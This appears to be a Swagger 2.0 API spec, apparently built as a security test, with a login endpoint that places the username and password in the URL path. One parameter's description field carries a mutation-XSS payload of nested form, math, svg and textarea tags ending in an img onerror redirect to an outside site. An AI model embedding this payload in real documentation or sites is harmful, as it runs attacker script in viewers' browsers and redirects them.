swagger: '2.0'
info:
  title: Classic API Resource Documentation
  description: 
  version: production
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /{Username}/{Password}:
    post:
      summary: Logs in
      parameters:
        - description: |
            <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img src="1" onerror="window.location.href = 'http://test.com'"</form>
          format: int64
          in: path
          name: id
          required: true
          type: integer
        - name: Username 
          required: true
          in: path
          type: string
        - name: Password 
          required: true
          in: path
          type: string
      responses:
        200:
          description: Login was successful
